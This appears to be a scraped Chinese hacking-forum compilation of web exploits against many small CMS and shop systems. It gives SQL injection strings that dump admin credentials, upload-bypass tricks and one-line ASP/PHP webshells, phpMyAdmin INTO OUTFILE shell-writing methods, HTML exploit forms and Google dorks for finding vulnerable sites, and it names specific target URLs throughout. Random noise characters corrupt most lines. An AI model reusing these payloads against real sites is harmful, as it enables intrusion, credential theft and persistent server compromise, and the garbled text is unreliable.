启航企业建站系统 cookie注入漏洞通杀所有版本5 y! K; D* R& d( p
7 C& y+ z$ A* N: ~2 |5 @" V直接上exploit:
- e" _% l; L& o$ T# M bjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));+ v+ c7 }/ R# s" e7 |
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
1 b; {% y3 {3 r8 o% V4 n6 ]--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) g$ J/ U" x6 e" T- o( yAsprain论坛 注册用户 上传图片就可拿到webshell
! u& J/ h7 w# i" p! o/ I7 S8 X/ @3 L0 k7 w' {% @% x3 V
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。# n' v/ M* W) i" S9 n0 p2 c8 q
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>, O+ p: b5 ]2 K- {+ Y4 B
2.gif 为一小图片文件,一定要小,比如qq表情图片
% b) P' r/ |! `. t) ~5 {3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用6 [5 F) V! R$ A }$ l& r
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
: p) A( E# m2 L1 j; r5.q.asp;.gif7 {5 r6 S5 g, Y" Z$ Z. M+ H
google:Powered by Asprain
) a9 u2 m: E) N( G' }- u--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ [* o' x0 w* t$ }1 ?( T4 a
. D7 Z' V# p2 @; g" z( N1 _ShopNum1全部系统存在上传漏洞。1 S1 S" Z# g& x/ M3 O$ {+ r
8 W5 Q. ^; f4 M5 r! l首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。4 N4 o8 \2 q) [2 |3 }
按说明 提示登录后台。。
3 W4 U m# f! y7 o4 E5 F$ W8 A: M$ d7 q在后台功能页面->附件管理->附件列表
3 H4 p- \8 j2 m, [- J# G0 `- S可以直接上传.aspx 后缀木马3 h! ~$ `6 X* {: u7 X
http://demo.shopnum1.com/upload/20110720083822500.aspx
0 D/ \/ j" }: N$ C( y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& K3 l2 s0 \6 [4 l
3 \, ]+ B, ]' S牛牛CMS中小企业网站管理系统 上传漏洞) ^4 d( |) O$ b4 q1 s5 h
0 p% F9 f9 q& s7 s) i: |牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。) s5 G# R) G! T. T) j
后台:admin/login.asp
2 A( x/ G7 x7 V7 W. H: g( Iewebeditor 5.5 Nday' |# W# G7 R% Y. X
exp:
, f1 D J7 s) a3 h<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?7 Q2 A' y/ a9 g y5 g& u
<input?type=file?name=uploadfile?size=100><br><br>?
+ S y- u& V9 |9 Z1 X( }0 n<input?type=submit?value=upload>?% r' w2 n4 ]5 P1 O8 T
</form>
0 g- A' f# w5 U' u6 d) U" C. i; W, Kps:先上传小马.# N- e& f2 k1 L# h3 C
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏9 `+ G2 n2 s& s T% s$ ~
3 Y5 Z6 E0 \& ?
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' J0 Q' L# x: E j# B+ b* n# h5 M @# b" M- m# v7 N. f- @
YothCMS 遍历目录漏洞+ ^! A: V" {/ N' j
; M! V0 M4 m8 P6 X5 G) Y. H+ U优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。2 Z* ?) B" j, W0 ]$ C
默认后台:admin/login.asp6 q6 |' {6 t/ G/ L& l
遍历目录:! w0 [, Y% }/ p$ O; T! B- b G1 {
ewebeditor/manage/upload.asp?id=1&dir=../
4 Q* I( q# E& Z6 Adata:
# W/ w1 S# R& S) Yhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa& L4 \* I/ c" V9 _# t
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 j/ K; m' {3 A; ]# D
' m+ Y! O; D! B, X8 iNet112企业建站系统 1.0; t n4 T4 z5 ~ U* a6 i2 S
: c, ~; a1 g3 K; `; ?
源码简介:4 I+ B8 l8 t9 p
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。+ @: j) r! z E% N0 v& U
添加管理员:
4 r! ?1 J( z Q& s7 |# ]7 Fhttp://www.0855.tv/admin/admin.asp?action=add&level=2
- c p+ R" Z. Z& w; F$ v8 D其实加不加都不是很重要,后台文件都没怎么作验证。 ^( w- t8 h1 s- \ ?
上传路径:" y) O% d7 ?! P' s
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=2009 S* G$ S* |9 U/ g) r
http://www.0855.tv/inc/Upfile.asp?Stype=2
2 v% G0 W8 x7 _8 x: S怎么利用自己研究。 B0 t- @8 J2 f. l% z( s
遍历目录:' f Y! ~3 j9 w; k# a7 [3 V g. h
http://www.0855.tv/admin/upfile.asp?path=../..
0 v& t* P/ D7 E* u: T2 t' U如:' N/ }3 c% s$ Y, X
http://www.0855.tv/admin/upfile.asp?path=../admin! r2 x& D5 z9 @1 X. T6 J
http://www.0855.tv/admin/upfile.asp?path=../data/ K8 x+ `& Y' u
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! f+ b1 j* U+ i5 Y# _7 r$ }7 ]2 l" b& w, _5 ~
易和阳光购物商城通杀 上传漏洞/ b9 K& ^5 ^ l' s' z
# R& _4 ^( {4 L; _- p3 {0 p/ \前提要求是IIS6.0+asp坏境。
; ]2 G0 g& U, }/ ?漏洞文件Iheeo_upfile.asp + Q# j3 I; ~* ]4 Q' {2 I
过滤不严.直接可以iis6.0上传% Q9 i0 ?: l. W9 D0 ?: ?
把ASP木马改成0855.asp;1.gif7 Q' ^( Q# |: U' `
直接放到明小子上传9 C6 H2 P `! v; C# G& E; C! O
Google搜索:inurl:product.asp?Iheeoid=5 ` S1 G* A$ p; Q1 r( U9 ?
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ?9 z# v9 u* E7 U6 [8 J4 C
0 _+ s# Q6 x) A5 d2 f$ p" `3 Fphpmyadmin后台4种拿shell方法* A* b; s, g4 F5 H0 I
! D4 W( x% i; U2 d
方法一:
R9 }2 K4 ?+ v3 I% {1 ECREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );3 e9 }. |- c1 A, g; U/ }" s
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');% m) {0 W W8 }1 ]( c: W
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';/ C/ [* D9 g- b3 d- w
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
h( Z8 L& ] E* [6 ~一句话连接密码:xiaoma! [7 X) _) e0 r5 `: q# k" U- r
方法二:6 m" }$ M# T8 C1 H
Create TABLE xiaoma (xiaoma1 text NOT NULL);
- R# A2 G( L, E2 KInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
4 _" q H- }4 \2 pselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';. z4 S, \* g! `# A% F5 d
Drop TABLE IF EXISTS xiaoma;' u8 `6 V. i9 ?; [$ i, h
方法三:4 ^4 N4 Y' T8 |6 i
读取文件内容: select load_file('E:/xamp/www/s.php');; D% c+ ^+ e. K7 u% d& F# }/ \
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'0 p; }# L3 h, R- v& K J
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
5 i2 q4 o! |+ n d5 v方法四:
6 n; Y% @- ~; i- [, gselect load_file('E:/xamp/www/xiaoma.php');
2 s& N3 T; _# i# T8 _: k0 Q( tselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
4 y; d" M3 I0 D; p* L然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
5 X; W# [; G0 u" D7 j1 q--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! g# |4 B6 {0 y8 p1 M. m( D" }* Q$ u, h9 |% i
传信网络独立开发网站源码0day漏洞" N7 N0 i' U& V
& ` z; q" q2 m. ]后台system/login.asp. v3 {9 R1 i" g# f1 g
进了后台有个ewebeditor ?5 z: I% z7 M
Google 搜索inurl:product1.asp?tyc=
* d5 ]! N, S) i0 B/ E编辑器漏洞默认后台ubbcode/admin_login.asp* R/ Q. Z3 o q: n) D/ E' o
数据库ubbcode/db/ewebeditor.mdb
! [7 C% w1 H# r- t$ u) e% G默认账号密码yzm 111111: o4 ~% Q W8 e* T/ u) k; m- }
: S. [. m7 m# F/ t: N- E A8 ~
拿webshell方法! t+ q2 @5 V& F
登陆后台点击“样式管理”-选择新增样式 ; o: E( q7 a- k' r
样式名称:scriptkiddies 随便写 3 }! x' O0 `: k
路径模式:选择绝对路径 " U3 z* Y+ L0 W: X4 U' E
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx2 N; P; z; p8 b1 @5 M. Q) ^
图片类型比如就是我们要上传的ASP木马格式1 B+ @, | V4 E* s) _, R
上传路径:/+ }+ b! G8 u, h6 [/ x' p% @. `7 a/ F
图片限制:写上1000 免的上不了我们的asp木马
, F- J5 w8 {: S; {6 s上传内容不要写
" k8 D" R( w5 }& s" k可以提交了
; V/ r1 T- m* n6 H样式增加成功!
0 {6 b* a/ r& G返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
" e3 w' ]! z& J0 l按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置 N& {9 B: [% q1 f. j
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies5 d" K* Y+ R' s P- a9 i5 b# i5 e
上ASP木马 回车 等到路径# F( A' ]; }1 E" o6 D$ _# m- j
, t- p4 T# F. s1 k% T后台:system/login.asp% _' b/ L5 c& E5 ~
Exp:
% l- K" n9 N9 \) ~# Q/ e8 Pand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master; |7 ?" D& Y: f
测试:
6 L/ S# ]# a) Nhttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master. d% u( |' f* ~0 X, C% z5 P
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
& ~, W, E5 T2 @3 |% s--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# D7 u7 s7 D @( J: Y R% O3 q7 u8 `. }8 Z$ l1 ~7 P8 I
foosun 0day 最新注入漏洞
0 U5 q2 i9 y3 e' M0 N5 T. g' k# n- P7 A# c1 f B
漏洞文件:www.xxx.com/user/SetNextOptions.asp2 ~+ B& @/ {9 ~- h( U
利用简单的方法:0 \+ P* I4 [4 {6 e( C
暴管理员帐号:* X/ f( R. ?( c. l! K/ K; m
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin. Y. o( _$ e K
暴管理员密码:6 ?( B# N( a/ L* s; ?" a
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,6 K1 p. b9 L. {3 M( b' x
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 j' o E) M2 G- j
, w# S& u* k5 ^5 i \" r$ {& Z网站程序的版权未知!- F) `. R) @7 b/ o6 I, f
s. G" d0 ^. c* e" [+ |2 z9 Y默认网站数据库:
1 \# h6 s! A Swww.i0day.com/data/nxnews.mdb' y8 N) Y, j2 P% p. [
ewebeditor 在线编辑器:2 E0 c, B- E2 L0 q" P+ k
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb* s& z% ^0 |( I- v! G- T7 X
登录地址:ewebeditor/admin_login.asp8 {/ H6 L$ o" t( k" f- h- o7 X
默认密码:admin admin" l5 G9 k( E# M" l
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data5 K' c2 c) o9 X3 W$ F) Y/ t
# h0 [2 v! p9 p+ ySql注入漏洞:; Q/ ^2 Y- o# i+ B% g
http://www.i0day.com/detail.asp?id=12( T; h+ r# `4 m/ ]
exp:' d1 M3 a8 T9 d- k- U$ b
union select 1,admin,password,4,5,6,7,8 from admin( c9 i7 B; r+ r
爆出明文帐号/密码! Y8 E% K+ e2 _1 }* g
8 K) G* a% T- z6 B7 \
上传漏洞:
* h& p$ N. x( y# P后台+upfile.asp
4 P: G& h: o. U2 r, c/ e如:
8 n7 Z3 G' X, h0 s7 g, ]: v) Thttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。$ \8 s3 w- A o( ~, w6 o, S
shell的地址:网址+后台+成功上传的马
5 ?' |5 i4 i( N$ Y4 G. h3 mgoogle:inurl:news.asp?lanmuName=
, p) G5 Y G0 v3 B. a------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 @" V' \8 q- W& C% n: j6 w6 Y$ m; W4 S3 S _6 \8 u6 d
dedecms最新0day利用不进后台直接拿WEBSHELL
5 U$ S4 h9 ] \6 [& M8 J2 z# a" X9 C7 @8 h
拿webshell的方法如下:5 Y: ~' U! r7 [
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
) S) h& K# u# o$ \% L( W* D( |前题条件,必须准备好自己的dede数据库,然后插入数据:
: J) L: e# y2 v4 C4 ^ _1 A" Binsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); ( c4 S3 j+ n& D$ z5 c2 o, p
' E; M) ^: b# s/ i再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
- K/ ~# y: u* G' t& I& v) A3 x" y<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">% S0 I; E! h! A' V6 p
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />; e# L/ [2 k: d7 M- i4 a
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
8 w5 X: p7 l8 k1 Z8 Y6 Y- a# N% j' m<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
+ _, _! e( f* _+ \4 Q4 W" W<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />. ~, O: G4 {0 W( A! n
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
( ^. M* f. F: U* g! z+ d8 }<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
$ f; R- @2 X. T- F<input type="text" value="true" name="nocache" style="width:400">
+ p m+ G' e/ T7 p: A<input type="submit" value="提交" name="QuickSearchBtn"><br />( v" t$ e" V% w; y6 K
</form>
; A, ~" Q/ ^( q5 H& a<script>: j1 W4 J1 T+ S7 C9 r6 v
function addaction()$ N7 c1 o4 q) ~9 r. Y
{& A% }2 X9 t6 i) E; C5 L
document.QuickSearch.action=document.QuickSearch.doaction.value;
+ x" |8 f) N2 X4 r( k; W8 K}
$ i4 c) F0 q' I2 ^% b</script>
8 w' c3 D# X/ U, _* V5 x- ]9 z" i-----------------------------------------------------------------------------------------------------------------------------------------------7 } b4 `% d* w2 o9 a& ?$ |
6 F+ e( P$ u- u, r0 k! w
dedecms织梦暴最新严重0day漏洞
0 Q, N4 t! D$ X5 }" ?& Lbug被利用步骤如下:, l! p( Q. _" A4 r- `# O2 R
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root, _' J. Q+ j2 z- k( k
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
& C! J$ I' H: k* s' [-------------------------------------------------------------------------------------------------------------------------------------------
- d4 h" L5 }8 a; S6 v4 ], m# o5 c3 g8 G0 h
多多淘宝客程序上传漏洞 # s5 f* s T- I3 B
漏洞页面:
0 w1 W- T V8 C0 n; padmin\upload_pic.php; c \4 e% @: V* Z! `: i
传送门:
" h7 o" P6 G7 Y$ d7 L/ ?, Phttp://www.www.com/admin/upload_pic.php?uploadtext=slide1
! z. {$ S1 \; J) R8 ]/ {* mPS:copy张图片马 直接 xxx.php 上传抓包地址!
6 a$ i; |. _ S------------------------------------------------------------------------------------------------------------------------------------------------------
$ p! u0 R! w0 x% C/ Q3 }- q
9 a% v, n- N! H3 c+ k5 \; L# o无忧公司系统ASP专业版后台上传漏洞( K& y4 M" W& S4 D0 E
漏洞文件 后台上传
' G$ b5 [4 o' }# ]$ p2 c0 A( [! eadmin/uploadPic.asp9 W9 g$ s* g: C# _, j- x
漏洞利用 这个漏洞好像是雷池的/ E- `; ~6 j' { O9 n4 p* i2 C
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1" |; o! G& |5 {. q
等到的webshell路径:
# S8 p- v4 C' `/UploadFiles/scriptkiddies.asp;_2.gif
* s/ {) x! A7 u: e$ B---------------------------------------------------------------------------------------------------------------------------------------------------
F; R0 i. v" V% C1 Z( E5 {* w5 Q; w( h x6 x/ r2 [, T
住哪酒店分销联盟系统2010$ p% B1 ?/ Y! Y4 d% B
Search:; ?4 S- {1 {" h C$ S; r9 r& ~
inurl:index.php?m=hotelinfo
2 k" z, m" W, X% ohttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
, m' l, F8 j+ C3 c7 J$ i% j默认后台:index.php?m=admin/login
2 ^! y' R9 R7 I) ~--------------------------------------------------------------------------------------------------------------------------------------------------
3 w7 I, X) F8 n
' q" L. u- g, u$ cinurl:info_Print.asp?ArticleID=6 Z/ e+ G: m- j+ V" ^( ^4 L- t4 z% I
后台 ad_login.asp
- G3 h2 L) C& z* ]* Y7 U! D爆管理员密码:
! f& K2 X% z' b( h# dunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
. ~3 k [ }5 L# w8 q------------------------------------------------------------------------------------------------------------------------------------------------------------6 ]( [/ ~- l k
" M0 ]+ h, b2 o$ e. I; o, I搜索框漏洞!7 l( j5 ~1 D$ g# `* v0 {
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='% Q* D, [; a( ^9 b7 K+ F
--------------------------------------------------------------------------------------------------------------------------------------------------------
3 |: A/ s, ]6 i$ `: ^# g8 ^# Q7 M8 ~
关键字:
" Q% z) e( Q4 b+ ]" G0 X+ ginurl:/reg_TemletSel.asp?step=2
' U" a3 ]/ X S5 x |- t或者: b; j2 \( E. v
电子商务自助建站--您理想的助手
2 S( @7 U9 @; V5 U$ T4 n) n-------------------------------------------------------------------------------------------------------------------------------------------------$ ~. |3 ~/ ~, `# E0 b
3 I1 k2 d: z7 {2 LiGiveTest 2.1.0注入漏洞2 `3 i" c. s" {) w8 Z% ?
Version: <= 2.1.0% V _( D$ w. c/ z' A' V# G
# Homepage: http://iGiveTest.com/0 G; V# V8 W5 b4 A$ z- U: \
谷歌关键字: “Powered by iGiveTest”( S' z4 T* c% ]4 G9 W
随便注册一个帐号。然后暴管理员帐号和密码) ?- ]- B/ |0 U8 k. t" X: Y
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
% w8 _; A- u' f" S------------------------------------------------------------------------------------------------------------------------------------------------3 ]8 [, q0 f: |/ d
: N/ E' }4 O, J# d5 u) k4 iCKXP网上书店注入漏洞
- V% m! {8 \1 l! A1 Y工具加表:shop_admin 加字段:admin3 Y- r' A0 p/ r! p. ]$ I
后台:admin/login.asp # F1 w+ i) |. v5 L5 Z7 G
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/) e0 {& F/ p ~: \1 p9 m
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息" T( ?" f. g+ [% {% p3 t' q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------% N9 N! M$ n1 P1 k' K
1 P* D) Y( w; a段富超个人网站系统留言本写马漏洞
: U. e5 K: y; V; m5 n" x X源码下载:http://www.mycodes.net/24/2149.htm( K+ L! J0 x% ]5 S- u D( ]5 @* u5 x
addgbook.asp 提交一句话。
; U V7 \' T3 x0 I' C连接: http://www.xxxx.tv/date/date3f.asp. ]6 T. k D8 u+ L* V
google:为防批量,特略!/ A( Z! B" X) T. H# h6 R0 w: r
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ w# J ~5 t1 ^, u* _; q( l! m6 Y3 Q
智有道专业旅游系统v1.0 注入及列目录漏洞1 u7 `( ~/ `4 o" M7 f P+ F x6 \
默认后台路径:/admin/login.asp
: H8 k- Q4 R1 \0 G默认管理员:admin
0 R" l/ R/ H+ t7 M/ b默认密码:123456, O% b) {( z! j* \# O& {4 @/ f
SQL EXP Tset:7 X3 `. _4 L, U+ R
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin+ J' H' u: B5 @$ o$ {
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. Z+ G6 d* D: t
- l6 t* C1 J- o5 Z8 vewebeditor(PHP) Ver 3.8 本任意文件上传0day
' I* J" E& V. C. w M$ EEXP:
7 m: T7 d3 Z0 G7 \1 g3 k<title>eWebeditoR3.8 for php任意文件上EXP</title>
; |" L0 Q- m) w<form action="" method=post enctype="multip4 m$ L% Y; g) ~& [8 I X- Z
art/form-data">
7 G: ^, v, \. A1 T+ B7 \<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
* ^* B. r9 A5 G0 Z% S! S/ J; _URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> ! }& H+ I# D+ m1 [ ~' ~$ I
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> 8 R t& I# N/ X2 u4 |1 H8 G6 ~( \4 _
file:<input type=file name="uploadfile"><br> 1 J ?: \) w+ T% ?- Y/ m, i
<input type=button value=submit onclick=fsubmit()> % {4 ]) @4 ~7 n2 U0 j/ }
</form><br>
: r2 _" b5 \7 s3 Y& @: f<script>
) \& q# v# l# I( O7 L6 A, Xfunction fsubmit(){ 9 [5 K ^/ f& @8 n% E
form = document.forms[0];
7 g) z/ v9 E9 K. m F5 t/ _/ pform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; s: W3 ]7 g- b- R/ m. j- L1 |% ~1 z
alert(form.action);
) r# y k$ j* p4 k1 P; N, a8 U$ Cform.submit(); 9 I: H3 J. z1 E
} 1 I4 x2 [3 H, i% r6 v8 A, C* N, P7 O
</script>. g! `; }* v6 O; ?0 T0 C
注意修改里面ewebeditor的名称还有路径。
! N+ v9 p2 R: U3 M& {---------------------------------------------------------------------------------------------------------------------------------------------------------------------------' G; I0 ]4 x D( Y' S* c1 b
' I2 k8 Z" _4 O% [5 x
提交’时提示ip被记录 防注入系统的利用
: T, U: }- Q+ |8 @, i网址:http://www.xxx.com/newslist.asp?id=122′: Q% \8 r8 i1 ?7 X8 E5 T7 ?
提示“你的操作已被记录!”等信息。
) f" h3 A9 i, \, H! P' d! C利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。+ z9 N. F, {- D' @' C0 |" D
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; U% q9 G% r% k1 |
l$ i! [) G- \+ G D o) T西部商务网站管理系统 批量拿shell-0day
; a; o1 d8 x, ?4 d0 e/ @' P. H这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
S" M) ]5 D x. A1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛8 e5 T" U4 G* e; u3 Y
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合+ R) s% |" m1 b1 Y/ I" @, s; J
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
0 x( ` E# z/ L0 P* k/ C---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ z3 f$ E* N( c8 Q0 D
: z3 N7 u5 f; g/ z2 {JspRun!6.0 论坛管理后台注入漏洞2 W1 ^! A2 \& y* a+ ~ u, s
9 t! T3 g9 {& \& Z8 `/ M
SEBUG-ID:20787 发布时间:2011-04-30 影响版本: p) l8 X" s9 t+ V7 P" p
JspRun!6.0 ' T/ q+ s- }! h# _
漏洞描述:
# [* K: o$ }9 a3 F- A8 hJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
1 x; N0 U3 I0 u" s! Q, A) x在处理后台提交的文件中ForumManageAction.java第1940行& ^( Q9 _; U3 {- V5 P' G
String export = request.getParameter("export");//直接获取,没有安全过滤# ^$ ~" i# e% }( A. }; y0 {
if(export!=null){
5 C5 h( _0 b0 |! ^List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
; k8 {" T. b. Gif(styles==null||styles.size()==0){
& s- @. r4 Z: y3 M<*参考
6 U# r- p6 ]) [& a: P. G( nnuanfan@gmail.com
9 F+ _: S4 I+ q$ _1 p& Q- m*> SEBUG安全建议:( ]5 z% }9 _ d3 W
www.jsprun.net
1 }- l6 k+ Z C4 B(1)安全过滤变量export
& b; e$ ~& _0 T) d0 c; [(2)在查询语句中使用占位符
1 m9 @: l! v5 ^9 F9 N. M: `* U------------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 d% c! N. {$ z6 Z
( H9 y3 j5 R2 J, D- N! f! `) y
乌邦图企业网站系统 cookies 注入' A3 ~# X% x, U. _4 ^$ n; l
, b8 B- X! m X4 Q# k程序完整登陆后台:/admin/login.asp
6 l1 n6 n7 r7 x* f# U默认登陆帐号:admin 密码:admin888
! k u* [, B3 v& U4 l语句:(前面加个空格)
9 P3 W8 o+ w S$ w" Nand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin8 j# w5 b" s* r8 g/ V
或者是16个字段:
5 P- |% n& Z* m+ |1 wand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin7 I& t- r) _& J/ @. ?& A/ w7 A
爆不出来自己猜字段。
, U3 Q- E+ b! `. k# Q9 d7 |' Z注入点:http://www.untnt.com/shownews.asp?=88- k% V, t& r& d7 n
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp; g* t: k# T; [+ ]; u: t8 ?
关键字:7 k3 B0 `3 j; q! u1 {
inurl:shownews?asp.id=
+ E! \7 P# s4 G6 N3 m9 d-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ @8 N/ R2 ^/ g0 |3 }3 U) z
$ Z& Q$ ~" Q: M- SCKXP网上书店注入漏洞. p' A/ c: T4 [/ D& t
5 k, Q! x. w5 W) F1 s
工具加表:shop_admin 加字段:admin* {7 f4 _! b* o B& Y5 ?7 x* N
后台:admin/login.asp
3 v1 u! F5 ?& J. c! N3 p! T7 O登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/# Z2 d) E! h* q2 n5 Y8 P
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
1 N t! w8 [" l- P---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) {3 A. K( N" ]6 _: s8 g' W6 b. b) ~ y7 ^- _
YxShop易想购物商城4.7.1版本任意文件上传漏洞
7 I4 E( ~# X% D* l L, z8 P/ J& m {: z. d/ L% D
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
2 F: E9 V4 `6 u8 C6 i% m0 C) h跳转到网站根目录上传任意文件。
6 ^; v: H0 q8 c8 n如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件% e' _( R, D. d. L! Q e
